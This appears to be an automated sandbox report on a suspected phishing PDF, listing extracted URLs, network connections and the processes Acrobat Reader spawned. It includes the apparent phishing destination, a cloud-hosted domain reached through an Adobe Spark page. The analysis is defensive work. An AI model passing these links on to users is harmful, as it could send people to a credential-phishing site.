      Source: RC89c6d3bd15f043db95a5a0a4b5cc9da0-file.min[1].js.24.drString found in binary or memory: https://assets.adobedtm.com/d4d114c60e50/f3fbfbe0e7ca/f496fb7b47d7/RC89c6d3bd15f043db95a5a0a4b5cc9da
      Source: RCa8534599c5d1425b9b1fceaf046699bf-source.min[1].js.24.drString found in binary or memory: https://assets.adobedtm.com/d4d114c60e50/f3fbfbe0e7ca/f496fb7b47d7/RCa8534599c5d1425b9b1fceaf046699b
      Source: RCbb47518ad08d43699044c6ef46f39ebb-file.min[1].js.24.drString found in binary or memory: https://assets.adobedtm.com/d4d114c60e50/f3fbfbe0e7ca/f496fb7b47d7/RCbb47518ad08d43699044c6ef46f39eb
      Source: launch-EN919758db9a654a17bac7d184b99c4820.min[1].js.24.drString found in binary or memory: https://assets.adobedtm.com/launch-EN919758db9a654a17bac7d184b99c4820.js
      Source: scripts[1].js0.24.drString found in binary or memory: https://blog.adobespark.com/
      Source: login[2].htm.24.drString found in binary or memory: https://cdn.cookielaw.org
      Source: 7a5eb705-95ed-4cc4-a11d-0cc5760e93db[1].js.24.drString found in binary or memory: https://cdn.cookielaw.org/vendorlist/googleData.json
      Source: 7a5eb705-95ed-4cc4-a11d-0cc5760e93db[1].js.24.drString found in binary or memory: https://cdn.cookielaw.org/vendorlist/iab2Data.json
      Source: 7a5eb705-95ed-4cc4-a11d-0cc5760e93db[1].js.24.drString found in binary or memory: https://cdn.cookielaw.org/vendorlist/iabData.json
      Source: en[1].js.24.drString found in binary or memory: https://developer.akamai.com/tools/boomerang#mpulse-session-information
      Source: headIE.fp-f9e44dbeef5252f4d02c4ed9c4b6a618[1].js.24.drString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/NodeList/forEach
      Source: publish.combined.fp-67aad4c89568b23c662905b8b4fd16bd[1].js.24.drString found in binary or memory: https://fb.me/react-polyfills
      Source: m-unsupported-88cd3215[1].js.24.drString found in binary or memory: https://feross.org
      Source: m-unsupported-88cd3215[1].js.24.drString found in binary or memory: https://feross.org/opensource
      Source: 7a5eb705-95ed-4cc4-a11d-0cc5760e93db[1].js.24.drString found in binary or memory: https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location
      Source: head.fp-00a38324dab316803fdc74cba4ad7ab9[1].js.24.drString found in binary or memory: https://github.com/focus-trap/focus-trap/blob/master/LICENSE
      Source: head.fp-00a38324dab316803fdc74cba4ad7ab9[1].js.24.drString found in binary or memory: https://github.com/focus-trap/tabbable/blob/master/LICENSE
      Source: chrome[1].js.24.drString found in binary or memory: https://github.com/janl/mustache.js/issues/186
      Source: chrome[1].js.24.drString found in binary or memory: https://github.com/janl/mustache.js/issues/189
      Source: chrome[1].js.24.drString found in binary or memory: https://github.com/janl/mustache.js/issues/244
      Source: marvelcommon-51100480[1].js.24.drString found in binary or memory: https://github.com/kriskowal/q/blob/v1/LICENSE
      Source: AcroRd32.exe, 00000002.00000002.373908461.0000000009350000.00000004.00000001.sdmpString found in binary or memory: https://ims-na1.adobelogin.com
      Source: chrome[1].js.24.drString found in binary or memory: https://issues.apache.org/jira/browse/COUCHDB-577
      Source: marvelcommon-51100480[1].js.24.drString found in binary or memory: https://lodash.com/
      Source: marvelcommon-51100480[1].js.24.drString found in binary or memory: https://lodash.com/license
      Source: marvelcommon-51100480[1].js.24.drString found in binary or memory: https://npms.io/search?q=ponyfill.
      Source: marvelcommon-51100480[1].js.24.drString found in binary or memory: https://openjsf.org/
      Source: en-US_bundle-6a358124[1].js.24.drString found in binary or memory: https://opsparc.gsfc.nasa.gov/?sdid=MC95SNMJ&mv=social
      Source: rbi5aua[1].js1.24.dr, vtg4qoo[1].js0.24.dr, onz5gap[1].js0.24.drString found in binary or memory: https://p.typekit.net/p.gif
      Source: RCbb47518ad08d43699044c6ef46f39ebb-file.min[1].js.24.drString found in binary or memory: https://p13n-stage.adobe.io/psdk/v2/content
      Source: RCbb47518ad08d43699044c6ef46f39ebb-file.min[1].js.24.drString found in binary or memory: https://p13n.adobe.io/psdk/v2/content
      Source: GG8mUEsjQvSUh[1].htm0.24.drString found in binary or memory: https://page.adobespark-assets.com/runtime/1.22/base-fonts.gz.js
      Source: GG8mUEsjQvSUh[1].htm0.24.dr, imagestore.dat.24.dr, ~DF8227BB7BB94304CB.TMP.23.drString found in binary or memory: https://page.adobespark-assets.com/runtime/1.22/images/favicon.ico
      Source: GG8mUEsjQvSUh[1].htm0.24.drString found in binary or memory: https://page.adobespark-assets.com/runtime/1.22/noscript.gz.css
      Source: GG8mUEsjQvSUh[1].htm0.24.drString found in binary or memory: https://page.adobespark-assets.com/runtime/1.22/runtime-prod.gz.js
      Source: GG8mUEsjQvSUh[1].htm0.24.drString found in binary or memory: https://page.adobespark-assets.com/runtime/1.22/runtime.gz.css
      Source: GG8mUEsjQvSUh[1].htm0.24.drString found in binary or memory: https://page.adobespark-assets.com/runtime/1.22/themes/crisp-fonts.gz.js
      Source: GG8mUEsjQvSUh[1].htm0.24.drString found in binary or memory: https://page.adobespark-assets.com/runtime/1.22/typekit-load.gz.js
      Source: publish.combined.fp-67aad4c89568b23c662905b8b4fd16bd[1].js.24.drString found in binary or memory: https://reactjs.org/docs/error-decoder.html?invariant=
      Source: login[2].htm.24.drString found in binary or memory: https://static.adobelogin.com&#x2F;imslib/imslib.min.js
      Source: privacy[1].htm0.24.drString found in binary or memory: https://static.adobelogin.com/imslib/imslib.min.js
      Source: unsupported[1].htm.24.drString found in binary or memory: https://support.apple.com/downloads/safari
      Source: scripts[1].js0.24.drString found in binary or memory: https://twitter.com
      Source: unsupported[1].htm.24.drString found in binary or memory: https://twitter.com/AdobeSpark
      Source: onz5gap[1].js0.24.drString found in binary or memory: https://use.typekit.net/af/180c9d/00000000000000003b9b3f8a/27/
      Source: vtg4qoo[1].js0.24.drString found in binary or memory: https://use.typekit.net/af/1da05b/0000000000000000000132df/27/
      Source: onz5gap[1].js0.24.drString found in binary or memory: https://use.typekit.net/af/37eaae/00000000000000003b9b3f83/27/
      Source: pps7abe[1].css.24.drString found in binary or memory: https://use.typekit.net/af/37eaae/00000000000000003b9b3f83/27/a?primer=388f68b35a7cbf1ee3543172445c2
      Source: pps7abe[1].css.24.drString found in binary or memory: https://use.typekit.net/af/37eaae/00000000000000003b9b3f83/27/d?primer=388f68b35a7cbf1ee3543172445c2
      Source: pps7abe[1].css.24.drString found in binary or memory: https://use.typekit.net/af/37eaae/00000000000000003b9b3f83/27/l?primer=388f68b35a7cbf1ee3543172445c2
      Source: rbi5aua[1].js1.24.drString found in binary or memory: https://use.typekit.net/af/3d913c/000000000000000000017709/26/
      Source: vtg4qoo[1].js0.24.drString found in binary or memory: https://use.typekit.net/af/40207f/0000000000000000000176ff/27/
      Source: vtg4qoo[1].js0.24.drString found in binary or memory: https://use.typekit.net/af/4b3e87/000000000000000000017706/27/
      Source: rbi5aua[1].js1.24.drString found in binary or memory: https://use.typekit.net/af/6c57c4/0000000000000000000158d6/26/
      Source: rbi5aua[1].js1.24.drString found in binary or memory: https://use.typekit.net/af/74fc30/0000000000000000000158d4/26/
      Source: vtg4qoo[1].js0.24.drString found in binary or memory: https://use.typekit.net/af/8f4e31/0000000000000000000132e3/27/
      Source: onz5gap[1].js0.24.drString found in binary or memory: https://use.typekit.net/af/949f99/00000000000000003b9b3068/27/
      Source: onz5gap[1].js0.24.drString found in binary or memory: https://use.typekit.net/af/97fbd1/00000000000000003b9b3f88/27/
      Source: pps7abe[1].css.24.drString found in binary or memory: https://use.typekit.net/af/97fbd1/00000000000000003b9b3f88/27/a?primer=388f68b35a7cbf1ee3543172445c2
      Source: pps7abe[1].css.24.drString found in binary or memory: https://use.typekit.net/af/97fbd1/00000000000000003b9b3f88/27/d?primer=388f68b35a7cbf1ee3543172445c2
      Source: pps7abe[1].css.24.drString found in binary or memory: https://use.typekit.net/af/97fbd1/00000000000000003b9b3f88/27/l?primer=388f68b35a7cbf1ee3543172445c2
      Source: scripts[1].js0.24.drString found in binary or memory: https://use.typekit.net/af/97fbd1/00000000000000003b9b3f88/27/l?primer=7cdcb44be4a7db8877ffa5c0007b8
      Source: rbi5aua[1].js1.24.drString found in binary or memory: https://use.typekit.net/af/9951d2/0000000000000000000158d7/26/
      Source: rbi5aua[1].js1.24.drString found in binary or memory: https://use.typekit.net/af/9d1933/00000000000000000001705b/26/
      Source: pps7abe[1].css.24.drString found in binary or memory: https://use.typekit.net/af/a0c22f/00000000000000003b9b3f84/27/a?primer=388f68b35a7cbf1ee3543172445c2
      Source: pps7abe[1].css.24.drString found in binary or memory: https://use.typekit.net/af/a0c22f/00000000000000003b9b3f84/27/d?primer=388f68b35a7cbf1ee3543172445c2
      Source: pps7abe[1].css.24.drString found in binary or memory: https://use.typekit.net/af/a0c22f/00000000000000003b9b3f84/27/l?primer=388f68b35a7cbf1ee3543172445c2
      Source: pps7abe[1].css.24.drString found in binary or memory: https://use.typekit.net/af/aa41d0/00000000000000003b9b3f86/27/a?primer=388f68b35a7cbf1ee3543172445c2
      Source: pps7abe[1].css.24.drString found in binary or memory: https://use.typekit.net/af/aa41d0/00000000000000003b9b3f86/27/d?primer=388f68b35a7cbf1ee3543172445c2
      Source: pps7abe[1].css.24.drString found in binary or memory: https://use.typekit.net/af/aa41d0/00000000000000003b9b3f86/27/l?primer=388f68b35a7cbf1ee3543172445c2
      Source: pps7abe[1].css.24.drString found in binary or memory: https://use.typekit.net/af/ad2a79/00000000000000003b9b3f8c/27/a?primer=388f68b35a7cbf1ee3543172445c2
      Source: pps7abe[1].css.24.drString found in binary or memory: https://use.typekit.net/af/ad2a79/00000000000000003b9b3f8c/27/d?primer=388f68b35a7cbf1ee3543172445c2
      Source: pps7abe[1].css.24.drString found in binary or memory: https://use.typekit.net/af/ad2a79/00000000000000003b9b3f8c/27/l?primer=388f68b35a7cbf1ee3543172445c2
      Source: scripts[1].js0.24.drString found in binary or memory: https://use.typekit.net/af/ad2a79/00000000000000003b9b3f8c/27/l?primer=7cdcb44be4a7db8877ffa5c0007b8
      Source: onz5gap[1].js0.24.drString found in binary or memory: https://use.typekit.net/af/b0c5f5/00000000000000003b9b3f85/27/
      Source: pps7abe[1].css.24.drString found in binary or memory: https://use.typekit.net/af/b0c5f5/00000000000000003b9b3f85/27/a?primer=388f68b35a7cbf1ee3543172445c2
      Source: pps7abe[1].css.24.drString found in binary or memory: https://use.typekit.net/af/b0c5f5/00000000000000003b9b3f85/27/d?primer=388f68b35a7cbf1ee3543172445c2
      Source: pps7abe[1].css.24.drString found in binary or memory: https://use.typekit.net/af/b0c5f5/00000000000000003b9b3f85/27/l?primer=388f68b35a7cbf1ee3543172445c2
      Source: scripts[1].js0.24.drString found in binary or memory: https://use.typekit.net/af/b0c5f5/00000000000000003b9b3f85/27/l?primer=7cdcb44be4a7db8877ffa5c0007b8
      Source: pps7abe[1].css.24.drString found in binary or memory: https://use.typekit.net/af/c8f445/00000000000000003b9aee47/27/a?primer=388f68b35a7cbf1ee3543172445c2
      Source: pps7abe[1].css.24.drString found in binary or memory: https://use.typekit.net/af/c8f445/00000000000000003b9aee47/27/d?primer=388f68b35a7cbf1ee3543172445c2
      Source: pps7abe[1].css.24.drString found in binary or memory: https://use.typekit.net/af/c8f445/00000000000000003b9aee47/27/l?primer=388f68b35a7cbf1ee3543172445c2
      Source: vtg4qoo[1].js0.24.drString found in binary or memory: https://use.typekit.net/af/cb695f/000000000000000000017701/27/
      Source: rbi5aua[1].js1.24.drString found in binary or memory: https://use.typekit.net/af/d5d9b2/00000000000000000000ffd9/26/
      Source: vtg4qoo[1].js0.24.drString found in binary or memory: https://use.typekit.net/af/d8f71f/0000000000000000000132e1/27/
      Source: rbi5aua[1].js1.24.drString found in binary or memory: https://use.typekit.net/af/e030d3/0000000000000000000158d3/26/
      Source: pps7abe[1].css.24.drString found in binary or memory: https://use.typekit.net/af/e09494/00000000000000003b9aee45/27/a?primer=388f68b35a7cbf1ee3543172445c2
      Source: pps7abe[1].css.24.drString found in binary or memory: https://use.typekit.net/af/e09494/00000000000000003b9aee45/27/d?primer=388f68b35a7cbf1ee3543172445c2
      Source: pps7abe[1].css.24.drString found in binary or memory: https://use.typekit.net/af/e09494/00000000000000003b9aee45/27/l?primer=388f68b35a7cbf1ee3543172445c2
      Source: vtg4qoo[1].js0.24.drString found in binary or memory: https://use.typekit.net/af/eaf09c/000000000000000000017703/27/
      Source: rbi5aua[1].js1.24.drString found in binary or memory: https://use.typekit.net/af/edcf1e/0000000000000000000158d9/26/
      Source: rbi5aua[1].js1.24.drString found in binary or memory: https://use.typekit.net/af/fe9c8e/0000000000000000000158d8/26/
      Source: privacy[1].htm0.24.drString found in binary or memory: https://use.typekit.net/pps7abe.css
      Source: login[2].htm.24.drString found in binary or memory: https://use.typekit.net/vtg4qoo.css
      Source: unsupported[1].htm.24.drString found in binary or memory: https://use.typekit.net/vtg4qoo.js
      Source: {135EBDC5-CADC-11EB-90E4-ECF4BB862DED}.dat.23.drString found in binary or memory: https://www.adobebe.com/page/GG8mUEsjQvSUh/
      Source: AcroRd32.exe, 00000002.00000002.373401937.0000000008A2D000.00000002.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0
      Source: scripts[1].js0.24.drString found in binary or memory: https://www.facebook.
      Source: unsupported[1].htm.24.drString found in binary or memory: https://www.google.com/chrome/browser/desktop/index.html
      Source: chrome[1].js.24.drString found in binary or memory: https://www.googletagmanager.com/gtag/js?
      Source: scripts[1].js0.24.drString found in binary or memory: https://www.instagram.com
      Source: unsupported[1].htm.24.drString found in binary or memory: https://www.instagram.com/AdobeSpark
      Source: scripts[1].js0.24.drString found in binary or memory: https://www.linkedin.com
      Source: unsupported[1].htm.24.drString found in binary or memory: https://www.mozilla.org/firefox
      Source: scripts[1].js0.24.drString found in binary or memory: https://www.pinterest.
      Source: scripts[1].js0.24.drString found in binary or memory: https://www.youtube.com
      Source: {135EBDC5-CADC-11EB-90E4-ECF4BB862DED}.dat.23.drString found in binary or memory: https://xinviaoafinabatizx.us-south.cf.appdomain.cloud
      Source: ~DF8227BB7BB94304CB.TMP.23.drString found in binary or memory: https://xinviaoafinabatizx.us-south.cf.appdomain.cloud/?bbre=zoxsazx
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
      Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
      Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
      Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
      Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
      Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
      Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
      Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
      Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
      Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
      Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
      Source: unknownHTTPS traffic detected: 13.225.74.123:443 -> 192.168.2.3:49736 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 13.225.74.123:443 -> 192.168.2.3:49735 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 13.224.195.109:443 -> 192.168.2.3:49741 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 13.224.195.109:443 -> 192.168.2.3:49740 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 13.224.195.109:443 -> 192.168.2.3:49739 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 13.224.195.109:443 -> 192.168.2.3:49738 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 13.224.195.109:443 -> 192.168.2.3:49737 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 52.216.105.77:443 -> 192.168.2.3:49744 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 52.216.105.77:443 -> 192.168.2.3:49745 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 169.47.124.25:443 -> 192.168.2.3:49758 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 169.47.124.25:443 -> 192.168.2.3:49759 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.145.59:443 -> 192.168.2.3:49761 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.145.59:443 -> 192.168.2.3:49762 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 151.101.1.195:443 -> 192.168.2.3:49764 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 151.101.1.195:443 -> 192.168.2.3:49763 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.16.123.175:443 -> 192.168.2.3:49766 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.16.123.175:443 -> 192.168.2.3:49765 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 13.224.187.69:443 -> 192.168.2.3:49770 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 13.224.187.69:443 -> 192.168.2.3:49771 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.16.148.64:443 -> 192.168.2.3:49774 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.16.148.64:443 -> 192.168.2.3:49775 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.20.184.68:443 -> 192.168.2.3:49776 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.20.184.68:443 -> 192.168.2.3:49777 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 63.33.31.50:443 -> 192.168.2.3:49778 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 63.33.31.50:443 -> 192.168.2.3:49779 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 15.236.176.210:443 -> 192.168.2.3:49780 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 15.236.176.210:443 -> 192.168.2.3:49781 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 13.225.74.37:443 -> 192.168.2.3:49782 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 13.225.74.37:443 -> 192.168.2.3:49783 version: TLS 1.2

      System Summary:

      barindex
      Found potential malicious PDF (bad image similarity)Show sources
      Source: Tribeca Investment Partners - Funds.pdfStatic PDF information: Image stream: 12
      Source: classification engineClassification label: mal64.phis.winPDF@19/308@15/15
      Source: Tribeca Investment Partners - Funds.pdfInitial sample: https://spark.adobe.com/page/GG8mUEsjQvSUh/
      Source: Tribeca Investment Partners - Funds.pdfInitial sample: https://spark.adobe.com/page/gg8muesjqvsuh/
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeFile created: C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ConnectorIconsJump to behavior
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeFile created: C:\Users\user\AppData\Local\Temp\acrord32_sbx\A9Rmzh6rb_163jmjl_4lk.tmpJump to behavior
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeFile read: C:\Program Files (x86)\desktop.iniJump to behavior
      Source: unknownProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe' 'C:\Users\user\Desktop\Tribeca Investment Partners - Funds.pdf'
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe' --type=renderer /prefetch:1 'C:\Users\user\Desktop\Tribeca Investment Partners - Funds.pdf'
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --backgroundcolor=16514043
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=renderer --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --touch-events=enabled --field-trial-handle=1696,14583101347345561594,418495030725437647,131072 --disable-features=VizDisplayCompositor --disable-gpu-compositing --service-pipe-token=18176514141952179124 --lang=en-US --disable-pack-loading --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.12.20035 Chrome/80.0.0.0' --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=18176514141952179124 --renderer-client-id=2 --mojo-platform-channel-handle=1664 --allow-no-sandbox-job /prefetch:1
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=gpu-process --field-trial-handle=1696,14583101347345561594,418495030725437647,131072 --disable-features=VizDisplayCompositor --disable-pack-loading --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.12.20035 Chrome/80.0.0.0' --lang=en-US --gpu-preferences=KAAAAAAAAACAAwABAQAAAAAAAAAAAGAAAAAAAAEAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAFAAAAEAAAAAAAAAAAAAAABgAAABAAAAAAAAAAAQAAAAUAAAAQAAAAAAAAAAEAAAAGAAAA --use-gl=swiftshader-webgl --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --service-request-channel-token=14323790637429607960 --mojo-platform-channel-handle=1780 --allow-no-sandbox-job --ignored=' --type=renderer ' /prefetch:2
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=renderer --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --touch-events=enabled --field-trial-handle=1696,14583101347345561594,418495030725437647,131072 --disable-features=VizDisplayCompositor --disable-gpu-compositing --service-pipe-token=15500690304138507742 --lang=en-US --disable-pack-loading --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.12.20035 Chrome/80.0.0.0' --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=15500690304138507742 --renderer-client-id=4 --mojo-platform-channel-handle=1868 --allow-no-sandbox-job /prefetch:1
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=renderer --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --touch-events=enabled --field-trial-handle=1696,14583101347345561594,418495030725437647,131072 --disable-features=VizDisplayCompositor --disable-gpu-compositing --service-pipe-token=4408287619177528861 --lang=en-US --disable-pack-loading --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.12.20035 Chrome/80.0.0.0' --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=4408287619177528861 --renderer-client-id=5 --mojo-platform-channel-handle=1872 --allow-no-sandbox-job /prefetch:1
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=renderer --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --touch-events=enabled --field-trial-handle=1696,14583101347345561594,418495030725437647,131072 --disable-features=VizDisplayCompositor --disable-gpu-compositing --service-pipe-token=4271642722203936314 --lang=en-US --disable-pack-loading --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.12.20035 Chrome/80.0.0.0' --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=4271642722203936314 --renderer-client-id=6 --mojo-platform-channel-handle=2204 --allow-no-sandbox-job /prefetch:1
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' https://spark.adobe.com/page/GG8mUEsjQvSUh/
      Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1968 CREDAT:17410 /prefetch:2
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe' --type=renderer /prefetch:1 'C:\Users\user\Desktop\Tribeca Investment Partners - Funds.pdf'Jump to behavior
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --backgroundcolor=16514043Jump to behavior
